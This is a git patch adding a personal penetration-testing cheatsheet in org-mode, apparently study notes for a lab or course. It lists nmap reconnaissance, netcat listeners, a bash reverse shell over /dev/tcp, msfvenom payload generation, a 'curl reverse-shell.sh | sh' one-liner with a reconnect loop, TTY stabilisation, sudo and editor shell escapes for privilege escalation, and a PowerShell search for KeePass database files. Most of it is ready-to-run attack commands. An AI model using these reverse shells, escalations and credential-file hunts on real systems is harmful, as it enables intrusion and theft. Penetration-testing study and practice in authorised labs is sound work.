From ad56aad266f0777963146f955a5b59b0dd5c5cfc Mon Sep 17 00:00:00 2001 From: Rh17S15 <136891969+Rh17S15@users.noreply.github.com> Date: Mon, 28 Jul 2025 09:30:28 +0200 Subject: [PATCH] links --- Cheatsheet.md | 3 + Cheatsheet.org | 245 +++++++++++++++++++++++++++++++++++++++++++++++++ 2 files changed, 248 insertions(+) create mode 100644 Cheatsheet.org diff --git a/Cheatsheet.md b/Cheatsheet.md index b034611..10526dc 100644 --- a/Cheatsheet.md +++ b/Cheatsheet.md @@ -337,3 +337,6 @@ sudo mysql -e ’! /bin/sh’ strace -o /dev/null /bin/sh sudo awk ’BEGIN {system(“/bin/sh”)}’ +https://nextcloud.th-deg.de/s/ex5yzQ6NtGeKp32 +https://github.com/Obedaya/scripts +https://mygit.th-deg.de/lg06087/pentesting diff --git a/Cheatsheet.org b/Cheatsheet.org new file mode 100644 index 0000000..97777a1 --- /dev/null +++ b/Cheatsheet.org @@ -0,0 +1,245 @@ +**** to install: + - magic wormhole + - tldr + - rlwrap + - + +#+BEGIN_SRC bash +sudo apt update --fix-missing && sudo apt install magic-wormhole tealdeer rlwrap +#+END_SRC +**** for keyring +-> if there is some kind of keyring error +#+BEGIN_SRC bash +sudo wget https://archive.kali.org/archive-keyring.gpg -O /usr/share/keyrings/kali-archive-keyring.gpg +#+END_SRC + +* information gathering + +*** nmap + +for quick scan of available ips +#+BEGIN_SRC bash +nmap -sn ip/24 +#+END_SRC +to filter output for open ips + +#+BEGIN_SRC bash +nmap -sn 192.168.1.0/24 | grep "for " | awk '{print $5}' > ips.txt +#+END_SRC + +scan open ports: +#+BEGIN_SRC bash +nmap -sCV -A -p $(nmap 192.168.1.155 -p- | grep open | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/.$//') 192.168.1.155 +#+END_SRC +*** dirb +#+BEGIN_SRC bash +dirb http://ip +#+END_SRC +**** bei windows +#+BEGIN_SRC bash +nmap --vuln ip +#+END_SRC +***** bei windows \+ smb + +#+BEGIN_SRC bash +nmap --script smb-vuln* ip +#+END_SRC + +* inital access +*** start listener: +#+BEGIN_SRC bash +rlwrap -cAr nc -nlvp 9002 +#+END_SRC +*** reverse shell bash: +#+BEGIN_SRC bash +/bin/bash -i >& /dev/tcp/192.168.1.157/9002 0>&1 +#+END_SRC +*** reverse shell file: +#+BEGIN_SRC bash +msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.157 LPORT=9002 -f raw -o rev.py +#+END_SRC +-> from revshells.com + +*** untested: + Reverse Shell as a Service + + 1. On your machine: +#+BEGIN_SRC bash + nc -l 1337 + or nlvp? +#+END_SRC + + 2. On the target machine: +#+BEGIN_SRC bash + curl https://reverse-shell.sh/yourip:1337 | sh +#+END_SRC + + +**** reconnecting: +#+BEGIN_SRC bash +while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done +#+END_SRC + +* privilege escalation +** always run these: +#+BEGIN_SRC bash +sudo -l +#+END_SRC +if sudo doesn't work: +[[*TTY Spawn Shell]] + +**** check cronjobs +#+BEGIN_SRC bash +ls /etc/cron.* +crontab -l +#+END_SRC + +** TTY Spawn Shell +***** if sudo still doesn't work +use +#+BEGIN_SRC bash +sudo -S command +#+END_SRC + +Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages. +*** Python spawn shell + +#+BEGIN_SRC bash +python -c 'import pty; pty.spawn("/bin/bash")' +#+END_SRC +Fully Interactive TTY +**** All the steps to stabilize your shell + +**The first step:** + +#+BEGIN_SRC bash +python3 -c 'import pty;pty.spawn("/bin/bash")' +#+END_SRC + +Which uses Python to spawn a better-featured bash shell. At this point, our shell will look a bit prettier, but we still won’t be able to use tab autocomplete or the arrow keys. + +**Step two is:** + +#+BEGIN_SRC bash +export TERM=xterm +#+END_SRC + +This will give us access to term commands such as clear. + +**Finally (and most importantly) we will background the shell using** + +#+BEGIN_SRC bash +Ctrl + Z +#+END_SRC + +Back in our own terminal we use + +#+BEGIN_SRC bash +stty raw -echo; fg +#+END_SRC + +This does two things: first, it turns off our own terminal echo which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes + +#+BEGIN_SRC bash +stty rows 38 columns 116 +#+END_SRC +*** OS system spawn shell + +#+BEGIN_SRC bash +echo os.system("/bin/bash") +#+END_SRC +*** Bash spawn shell + +#+BEGIN_SRC bash +/bin/sh -i +#+END_SRC +*** Perl spawn shell + +#+BEGIN_SRC bash +perl —e 'exec "/bin/sh";' +#+END_SRC +*** Ruby spawn shell + +ruby: exec "/bin/sh" + +*** Lua spawn shell + +lua: os.execute("/bin/sh") + +*** IRB spawn shell + +exec "/bin/sh" + +*** VI spawn shell + +#+BEGIN_SRC bash +:!bash +#+END_SRC +*** VI(2) spawn shell + +#+BEGIN_SRC bash +:set shell=/bin/bash:shell +#+END_SRC +*** Nmap spawn shell + +#+BEGIN_SRC bash +!sh +#+END_SRC + +**** Exiftools + +Metadaten auslesen: + +#+BEGIN_SRC bash +exiftool picture.png +#+END_SRC + +Binwalk (Binary Daten exportieren): + +#+BEGIN_SRC bash +binwalk -e picture.png +#+END_SRC + + + +* Windows +*** WinPEAS +https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS +*** LOLBAS +https://lolbas-project.github.io/# +*** WADCOMS +https://wadcoms.github.io/ +*** PrivescCheck Script as an alternative to WinPEAS +https://github.com/itm4n/PrivescCheck + +*** RUN these while the other scripts are working +#+BEGIN_SRC powershell +whoami /priv + +whoami /all + +schtasks /query +#+END_SRC + +*** for finding kbdx Files +https://github.com/ivanmrsulja/keepass2john +#+BEGIN_SRC powershell +Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue +#+END_SRC + + + + +quick Wins Linux: +gdb -nx -ex '!sh' -ex quit +sudo mysql -e '! /bin/sh' +strace -o /dev/null /bin/sh +sudo awk 'BEGIN {system("/bin/sh")}' + + +evilwinrm +quick Wins Linux: +gdb -nx -ex '!sh' -ex quit +sudo mysql -e '! /bin/sh' +strace -o /dev/null /bin/sh +sudo awk 'BEGIN {system("/bin/sh")}'